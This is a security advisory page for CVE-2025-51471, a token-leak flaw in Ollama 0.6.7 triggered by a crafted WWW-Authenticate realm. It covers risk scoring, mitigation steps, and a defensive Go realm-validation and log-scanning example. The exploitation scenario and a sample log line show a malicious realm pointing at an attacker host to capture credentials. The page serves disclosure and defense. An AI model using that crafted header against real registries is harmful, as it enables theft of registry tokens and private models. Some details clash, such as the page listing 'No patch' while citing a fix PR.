CVE-2025-51471: Ollama: auth token hijack via crafted WWW-Authenticate

Severity: MEDIUM | PoC available | CISA SSVC: Track*
Published July 22, 2025
CISO Take

Ollama 0.6.7 leaks authentication tokens to attacker-controlled registries when a user pulls a model: a malicious realm value in WWW-Authenticate redirects the token request to an adversary's server. Any environment pulling models from untrusted or public registries is exposed. Patch immediately or restrict model pulling to verified internal registries via network policy.

Risk Assessment

Effective risk is moderate-to-high in enterprise AI environments despite the medium CVSS score. The AC:H and UI:R modifiers reflect that exploitation requires a malicious registry interaction, but in practice many teams pull models ad hoc from community sources, which makes it trivial to social-engineer the pull. The scope change (S:C) and C:H impact are the critical signals: a stolen registry token can be used to pivot into private model repositories, exposing proprietary fine-tuned models or granting access to broader MLOps infrastructure. No public exploitation has been observed and the CVE is not in CISA KEV, but the gecko.security writeup lowers the bar significantly.

Affected Systems

Package: ollama | Ecosystem: pip | Vulnerable range: (not given) | Patched: No patch


Severity & Risk

CVSS 3.1: 6.9 / 10
EPSS: 0.0% chance of exploitation in 30 days (higher than 7% of all CVEs)
Exploitation status: Exploit available
Exploitation: MEDIUM
Sophistication: Moderate
Exploitation confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV (Attack Vector): Network
AC (Attack Complexity): High
PR (Privileges Required): None
UI (User Interaction): Required
S (Scope): Changed
C (Confidentiality): High
I (Integrity): Low
A (Availability): None

Recommended Action

5 steps
  1. PATCH

    Upgrade Ollama beyond 0.6.7 immediately (track https://github.com/ollama/ollama/releases for the fix in PR #10750).

  2. RESTRICT

    Block outbound connections from Ollama instances to non-approved registry endpoints at the network layer; whitelist only internal or verified registries.

  3. AUDIT

    Review logs for /api/pull requests to external registries; look for WWW-Authenticate headers pointing to unexpected realm URLs.

  4. ISOLATE

    Run Ollama instances without access to production credentials; use short-lived or registry-scoped tokens rather than long-lived credentials.

  5. DETECT

    Alert on Ollama processes making authentication requests to domains not matching your approved registry list.

CISA SSVC Assessment

Decision: Track*
Exploitation: poc
Automatable: No
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, robustness and cybersecurity
ISO 42001: 6.1.2 - AI risk assessment; 8.4 - AI system operation and monitoring
NIST AI RMF: GOVERN-1.1 - Policies for AI risk management; MANAGE-2.2 - Risk treatment for AI system vulnerabilities
OWASP LLM Top 10: LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-51471?

Ollama 0.6.7 leaks authentication tokens to attacker-controlled registries when a user pulls a model: a malicious realm value in WWW-Authenticate redirects the token request to an adversary's server. Any environment pulling models from untrusted or public registries is exposed. Patch immediately or restrict model pulling to verified internal registries via network policy.

Is CVE-2025-51471 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-51471, increasing the risk of exploitation.

How to fix CVE-2025-51471?

1. PATCH: Upgrade Ollama beyond 0.6.7 immediately (track https://github.com/ollama/ollama/releases for the fix in PR #10750).
2. RESTRICT: Block outbound connections from Ollama instances to non-approved registry endpoints at the network layer; whitelist only internal or verified registries.
3. AUDIT: Review logs for /api/pull requests to external registries; look for WWW-Authenticate headers pointing to unexpected realm URLs.
4. ISOLATE: Run Ollama instances without access to production credentials; use short-lived or registry-scoped tokens rather than long-lived credentials.
5. DETECT: Alert on Ollama processes making authentication requests to domains not matching your approved registry list.

What systems are affected by CVE-2025-51471?

This vulnerability affects the following AI/ML architecture patterns: LLM inference (Ollama self-hosted), Model serving infrastructure, CI/CD model delivery pipelines, MLOps automation (automated model pulls), Local AI development environments.

What is the CVSS score for CVE-2025-51471?

CVE-2025-51471 has a CVSS v3.1 base score of 6.9 (MEDIUM). The EPSS exploitation probability is 0.03%.

Technical Details

NVD Description

Cross-Domain Token Exposure in server.auth.getAuthorizationToken in Ollama 0.6.7 allows remote attackers to steal authentication tokens and bypass access controls via a malicious realm value in a WWW-Authenticate header returned by the /api/pull endpoint.

Exploitation Scenario

An adversary registers a namespace on a public model hub or stands up a malicious Ollama-compatible registry. They socially engineer a developer or automate a pull via a poisoned model reference (e.g., in a requirements file, LLMOps config, or CI workflow). When Ollama calls /api/pull, the malicious registry responds with WWW-Authenticate: Bearer realm='https://attacker.com/token'. Ollama's getAuthorizationToken follows the realm URL without domain validation and forwards the user's authentication credentials. The attacker captures the token and uses it to authenticate to the victim's legitimate private model registry, exfiltrating proprietary fine-tuned models or injecting poisoned replacements.
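The missing check the scenario above describes (the realm URL is followed without validating its host) and the AUDIT and DETECT steps from the recommended actions, as one added Go example. This is not Ollama's code and not the fix shipped in PR #10750; it assumes a constructed pull-log format, a hypothetical approved-registry allowlist, and constructed hostnames (models.internal.example, hub.evil.example, attacker.example). RealmAllowed is the defensive rule a token client should apply before sending credentials; FindSuspiciousRealms applies the same rule over sample log lines to surface pulls whose challenge pointed elsewhere.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Constructed allowlist of registries this deployment may authenticate to.
// Assumption: the organisation maintains such a list; it is not an Ollama setting.
var approvedRegistries = map[string]bool{
	"registry.ollama.ai":      true,
	"models.internal.example": true,
}

// realmRe extracts the realm value from a WWW-Authenticate challenge such as
//   Bearer realm='https://host/token',service='registry'
var realmRe = regexp.MustCompile(`(?i)realm=['"]?([^'",\s]+)['"]?`)

// logRe matches the constructed log format used by sampleLog below.
var logRe = regexp.MustCompile(`registry=(\S+)\s+www-authenticate="([^"]*)"`)

// ParseRealm returns the realm URL carried by a WWW-Authenticate header.
func ParseRealm(header string) (string, bool) {
	m := realmRe.FindStringSubmatch(header)
	if m == nil {
		return "", false
	}
	return m[1], true
}

// RealmAllowed is the check the vulnerable flow lacked: the token endpoint must
// be HTTPS and its host must be the registry that issued the challenge or an
// approved registry. Otherwise the token would be sent to whoever controls the
// realm host.
func RealmAllowed(registryHost, realm string) bool {
	u, err := url.Parse(realm)
	if err != nil || u.Scheme != "https" || u.Hostname() == "" {
		return false
	}
	host := strings.ToLower(u.Hostname())
	return host == strings.ToLower(registryHost) || approvedRegistries[host]
}

// FindSuspiciousRealms scans pull log lines and returns every realm URL that
// would have directed a token request away from the registry being pulled from.
func FindSuspiciousRealms(lines []string) []string {
	var flagged []string
	for _, line := range lines {
		m := logRe.FindStringSubmatch(line)
		if m == nil {
			continue // no challenge recorded on this line
		}
		registryHost, header := m[1], m[2]
		realm, ok := ParseRealm(header)
		if !ok {
			continue
		}
		if !RealmAllowed(registryHost, realm) {
			flagged = append(flagged, realm)
		}
	}
	return flagged
}

// sampleLog is constructed for this example; the format is not Ollama's own.
var sampleLog = []string{
	`2025-07-22T10:00:01Z pull registry=models.internal.example www-authenticate="Bearer realm='https://models.internal.example/token',service='registry'"`,
	`2025-07-22T10:00:05Z pull registry=registry.ollama.ai www-authenticate="Bearer realm='https://registry.ollama.ai/v2/token',service='registry'"`,
	`2025-07-22T10:01:12Z pull registry=hub.evil.example www-authenticate="Bearer realm='https://attacker.example/token',service='registry'"`,
	`2025-07-22T10:02:40Z pull registry=models.internal.example www-authenticate="Bearer realm='http://models.internal.example/token',service='registry'"`,
	`2025-07-22T10:03:00Z pull registry=models.internal.example status=200`,
}

func main() {
	for _, realm := range FindSuspiciousRealms(sampleLog) {
		fmt.Println("ALERT: token request would go to", realm)
	}
}
```

Two of the five constructed lines are flagged: the realm on a foreign host, and a same-host realm that downgrades to plain HTTP (which would send the token in the clear). The host comparison is deliberately exact rather than suffix-based, so a realm on a look-alike subdomain of an approved registry is still rejected unless that exact host is on the list.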

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N

Timeline

Published: July 22, 2025
Last Modified: October 17, 2025
First Seen: July 22, 2025
